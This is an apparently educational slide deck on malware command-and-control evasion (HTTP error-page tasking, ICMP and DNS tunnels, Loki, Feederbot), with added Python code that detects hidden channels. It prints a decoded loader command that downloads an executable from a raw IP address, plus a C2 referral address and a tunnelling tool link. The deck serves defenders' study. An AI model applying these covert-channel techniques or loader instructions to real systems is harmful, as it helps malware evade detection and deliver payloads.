MALWARE COMMAND AND CONTROL: EVASION TACTICS AND TECHNIQUES
Avkash Kathiriya
Information Security Learner
Dhawal Shah
Information Security Learner
AGENDA
• CKC (Cyber Kill Chain) Revision
• What is Command and control?
• What is Malware CnC?
• Why CnC?
• Channels of CnC
• Some Advanced CnC Techniques
6/11/2016 MALWARE CNC BY AVKASH K & DHAWAL SHAH 2
Our focus in this session will be Command and Control.
[Slide visual: a command prompt, C:\ Command and Control > CnC.txt, spelling out "Command & Control".]
The idea is to give commands that control your systems and accomplish your aim.
What is Malware CnC?
[Diagram: the attacker sends commands to the command and control server, which passes them to the compromised system; responses travel back along the same path.]
Why Malware CnC?
• Receive commands from the operator
• Send feedback to the operator
• Receive updates and modules from the operator
• Evade security:
  – Intrusion detection
  – Antivirus
  – Incident response
  – Forensic analysis
Evolution of CnC Techniques
[Timeline: mostly IRC-based malware at first, then a rapid evolution of CnC techniques: P2P, DNS, HTTP, domain flux, tunnelling.]
The answer is to stay undetected, which creates the need for covert communication.
Covert communication?
• The capability to transfer information between two hosts that are not explicitly allowed to communicate.
• A mechanism for sending and receiving data between machines without alerting any firewalls and IDSs on the network.
• You want to communicate with someone without being observed.
• Cryptography/encryption is not good enough:
  – You want to hide the fact that you are communicating at all.
  – The best way is to hide the communication in innocuous-looking network traffic or data.
  – The firewall must let the traffic pass through.
Covert communication?
[Diagram: DNS requests and replies leave the internal network as usual; malicious DNS requests and replies travel the same path.]
It is a method of performing malicious communication over legitimate, basic channels that you cannot block at the perimeter level, e.g. DNS in this case.
Before that, let's first understand the basic user communication channels.
Channels of "User" communication
[Diagram: the user communicates through four channels: Endpoint, Email, Web and Network.]
Channels of "Malware" communication
[Diagram: malware uses the same four channels: Endpoint, Email, Web and Network.]
Web CnC?
• Direct connection to the Internet on port 80
  – Will be blocked in most cases
• Identify the proxy being used and divert the Web CnC through the proxy
  – The proxy needs authentication, which the malware can get anyway
• Reverse WWW shell
  – Looks like an ordinary HTTP request to servers on the firewall
  – The server sends back HTML resources that are interpreted as shell commands
  – E.g. GoToMyPC
Advanced Web CnC?
• Using HTTP GET and POST for communication
• HTTP tunnelling
• Downloading information in favicon.ico:
  – Extract the information using LSB steganography
  – Decrypt the information using RC4
Advanced Web CnC?
• YouTube as a malware CnC
[Diagram: attacker and endpoint exchanging messages through YouTube.]
Advanced Web CnC?
• HTTP error messages

HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->

Decoded value: 1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
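A defender-side check for the trick above, written as an added example (not code from the slides): it pulls base64 runs out of HTML comments in an error page and decodes them, which is how an analyst or a proxy filter would surface the hidden tasking. The sample response is constructed from the slide's 404 page, and the field split into timestamps and commands is an assumption.

```python
import base64
import binascii
import re

# Constructed sample, modelled on the 404 page shown on the slide: the tasking
# rides in an HTML comment that a browser never renders.
SAMPLE_404 = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD>'
    "<TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>"
    "The requested URL /XXX/YYY.php was not found on this server."
    "<P><HR><ADDRESS></ADDRESS></BODY></HTML>"
    "<!-- DEBUG: MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMv"
    "Z29sZGVuMy5leGUjMTQyODUxMjA2MTc1NDYzNSNyYXRlIDYwIw DEBUG-->"
)

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
# Base64 runs of 16+ characters; shorter runs are usually ordinary words.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_b64_text(token):
    """Decode a (possibly unpadded) base64 token to printable text, else None."""
    token += "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def hidden_comment_payloads(html):
    """Return every base64 string inside an HTML comment that decodes to text."""
    found = []
    for comment in COMMENT_RE.findall(html):
        for token in B64_RE.findall(comment):
            text = decode_b64_text(token)
            if text:
                found.append(text)
    return found

def split_tasking(decoded):
    """Split the '#'-delimited tasking into (timestamps, commands); assumed layout."""
    fields = [f for f in decoded.split("#") if f]
    stamps = [f for f in fields if f.isdigit()]
    commands = [f for f in fields if not f.isdigit()]
    return stamps, commands
```

Run over proxy-logged error bodies, a hit on a 404 page is a strong signal on its own: legitimate servers have no reason to embed base64 tasking in a "Not Found" response.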
Email CnC?
• It's pretty simple: just use the SMTP channel for sending and receiving commands from your controller.
[Diagram: the attacker sends commands to the endpoint through SMTP and receives responses through SMTP.]
An evasion technique seen in this type of communication is the use of PowerShell.
Network CnC?
Types of covert channel communication at the network layer:
• Storage channels
  – Hide data within unused TCP/IP packet header fields
  – TCP flags field, TCP ISN, etc.
• Timing channels
  – Modulate system resources in such a way that a receiver can observe and decode them
  – Port knocking, varying packet rates, etc.
Network CnC?
• Protocol tunnelling:
  – A protocol that carries data from another protocol.
  – Example: SSH
  – SSH allows you to set up a secure connection between two computers.
  – This connection can be used for insecure protocols such as FTP.
• Tunnel through any TCP/IP traffic
  – Insert data in unused or misused fields in the protocol header of packets, such as:
  – IP identification
  – TCP sequence number
  – TCP acknowledgment number
Network CnC?
• Hiding information in existing protocols such as HTTP, DNS and ICMP
• Pros/cons of each protocol:
  – HTTP is good for large data transfer, but more conspicuous
  – DNS is not great for data transfer, but good for C&C
  – ICMP is good for C&C but is often blocked
• The author of The Rootkit Arsenal proposes writing your own TCP/IP stack using MS Windows NDIS
• BitTorrent tracker protocol tunnelling
Network CnC? Example: LOKI
The attacker installs the Loki server (a.k.a. LokiD) on the victim and runs the Loki client on his own machine. Loki tunnels the attacker's commands: the attacker writes shell commands; the Loki client sends several ICMP packets to the victim, each containing part of the commands; the Loki server receives the ICMP packets, extracts the attacker's commands and executes them. In reverse, the Loki server wraps the responses in ICMP messages and sends them to the Loki client, which displays them. Port scanners or netstat cannot detect Loki since ICMP does not use ports. The only traces are the Loki server running as root and the ICMP messages going back and forth.
Network CnC?
• ICMP covert tunnels
• Mechanism: use of ping request/response
• Tool: Ptunnel (http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.71.tar.gz)
ICMP Covert Tunnels
• [Screenshot: Wireshark capture of the ptunnel tool.]
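A classifier for the ICMP echo sessions an analyst would pull out of a capture like the ptunnel or Loki traffic above, added here as an example (not the tools' or the slides' code): it parses raw echo packets, verifies the checksum, groups them by ICMP identifier and flags sessions whose payloads change or grow beyond a ping. The known ping payload set, the 64-byte threshold and the sample capture are assumptions.

```python
import struct
from collections import defaultdict
KNOWN_PING_PAYLOADS = {b"abcdefghijklmnopqrstuvwabcdefghi"}  # Windows ping.exe; assumed set, extend per host

def icmp_checksum(data):
    """RFC 1071 one's-complement sum over ICMP header plus payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(ident, seq, payload, icmp_type=8):
    """Raw echo request (8) or reply (0); used here only to build the sample."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return hdr[:2] + struct.pack("!H", icmp_checksum(hdr + payload)) + hdr[4:] + payload

def parse_echo(pkt):
    """(type, ident, seq, payload) for a well-formed echo, else None."""
    if len(pkt) < 8:
        return None
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    ok = icmp_type in (0, 8) and code == 0 and \
        icmp_checksum(pkt[:2] + b"\x00\x00" + pkt[4:]) == csum
    return (icmp_type, ident, seq, pkt[8:]) if ok else None

def classify_echo_stream(packets, max_benign_len=64):
    """Per ICMP identifier: a ping session repeats one small known payload, a tunnel carries data."""
    sessions = defaultdict(list)
    for pkt in packets:
        parsed = parse_echo(pkt)
        if parsed:
            sessions[parsed[1]].append(parsed[3])
    verdicts = {}
    for ident, payloads in sessions.items():
        reasons = []
        if len(set(payloads)) > 1:
            reasons.append("payload changes between packets")
        if max(len(p) for p in payloads) > max_benign_len:
            reasons.append("oversized payload")
        if any(p not in KNOWN_PING_PAYLOADS for p in payloads):
            reasons.append("payload is not a known ping pattern")
        verdicts[ident] = ("suspicious" if reasons else "benign", reasons)
    return verdicts

def constructed_capture():
    """Constructed sample: one normal Windows ping session, one tunnel-like session."""
    pkts = [build_echo(1, s, b"abcdefghijklmnopqrstuvwabcdefghi") for s in range(1, 4)]
    chunks = [b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n", bytes(range(96)), b"chunk-3"]
    return pkts + [build_echo(0x4242, s, c) for s, c in enumerate(chunks, 1)]
```

Linux and BSD ping embed a timestamp at the start of the payload, so for those hosts compare only the fixed tail of the payload before applying the "changes between packets" rule.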
DNS Covert Tunnels
Mechanism of DNS covert channel - Feederbot

Normal:
;QUESTION
newcommunitybank.com. IN A
;ANSWER
newcommunitybank.com. 86400 IN A 74.54.82.153

Malicious:
;QUESTION
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0 IN TXT "aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
DNS Covert Tunnels
Mechanism of DNS covert channel - Feederbot
• 50-char system-dependent bot ID: f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4
• RC4-encrypted bootstrap traffic:
0000  8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32  .h..........94.2
0010  33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F  3.6.67.images.mo
0020  76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C     viedyear.net..<
• Contains a referral to the next C2 server node, 94.23.6.67
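Scoring DNS queries for the Feederbot-style indicators above (a long hex bot ID as the leftmost label, an ANY or TXT query type, a zero-TTL answer), as an added example that is not part of the slides; the log tuple format, thresholds and equal weighting are assumptions, and the query log is constructed from the two lookups on the slide.

```python
import math
from collections import Counter

# Constructed query log modelled on the two lookups on the slide:
# (query name, query type, TTL of the answer).
SAMPLE_LOG = [
    ("newcommunitybank.com.", "A", 86400),
    ("www.google.com.", "A", 300),
    ("f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com.", "ANY", 0),
    ("mail.example.org.", "MX", 3600),
]

HEX_CHARS = set("0123456789abcdef")
PAYLOAD_QTYPES = {"TXT", "ANY", "NULL"}  # record types that carry free-form data

def shannon_entropy(s):
    """Bits per character; random hex tops out at 4.0, English words sit lower."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def score_query(qname, qtype, ttl):
    """Return (score, reasons); each independent tunnel indicator adds one point."""
    labels = [l for l in qname.rstrip(".").split(".") if l]
    first = labels[0].lower() if labels else ""
    reasons = []
    if len(first) >= 32:
        reasons.append("long leftmost label (%d chars)" % len(first))
    if len(first) >= 16 and set(first) <= HEX_CHARS:
        reasons.append("hex-only label")
    # Short real words score high on entropy too, so only judge long labels.
    if len(first) >= 24 and shannon_entropy(first) > 3.5:
        reasons.append("high-entropy label")
    if qtype in PAYLOAD_QTYPES:
        reasons.append("payload-friendly qtype " + qtype)
    if ttl == 0:
        reasons.append("zero TTL answer")
    return len(reasons), reasons

def suspicious_queries(log, threshold=3):
    """Queries scoring at or above the threshold, with their reasons."""
    hits = []
    for qname, qtype, ttl in log:
        score, reasons = score_query(qname, qtype, ttl)
        if score >= threshold:
            hits.append((qname, score, reasons))
    return hits
```

The threshold matters: CDN and anti-spam lookups legitimately use long or hashed labels, so a single indicator is noise while three or more together is worth an alert.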
DNS Covert Tunnels
• [Screenshot: Wireshark capture of OzymanDNS.]
Endpoint CnC??
[Diagram: endpoint with a USB device attached.]
Not actual CnC, but the method of infection and communication was USB in this case.
Conclusion
• CnC is key for any malware to sustain its footprint
• Techniques and tactics to evade detection of the CnC channel have evolved over time
• The idea is to hide in the mass and exploit the flows of traditional communication channels
• Attackers stay connected with their target and keep on nurturing the malware they planted
References
• Cyber Kill Chain – Lockheed Martin
• Covert Channels – SANS Institute
• Introduction to Malicious Code – Erland Jonsson
• Hiding in Plain Sight – Black Hat EU 2015
• Twitter: @avkashk
• Blog: www.avkashk.wordpress.com or LinkedIn Pulse (Avkash Kathiriya)
• Email: [email protected]
• Twitter: @shahdhawal
• Email: [email protected]